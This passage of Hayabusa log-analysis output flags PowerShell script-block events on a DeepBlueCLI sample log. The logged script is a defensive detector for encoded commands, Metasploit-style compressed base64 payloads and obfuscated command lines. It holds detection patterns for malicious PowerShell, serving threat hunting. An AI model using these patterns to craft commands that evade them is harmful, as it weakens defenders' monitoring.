($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logna",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:25:40.262 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"me=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:25:40.262 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"me=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:25:40.262 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:25:40.265 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:25:40.272 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:25:40.275 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:27:04.659 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:27:04.659 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:27:04.660 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if 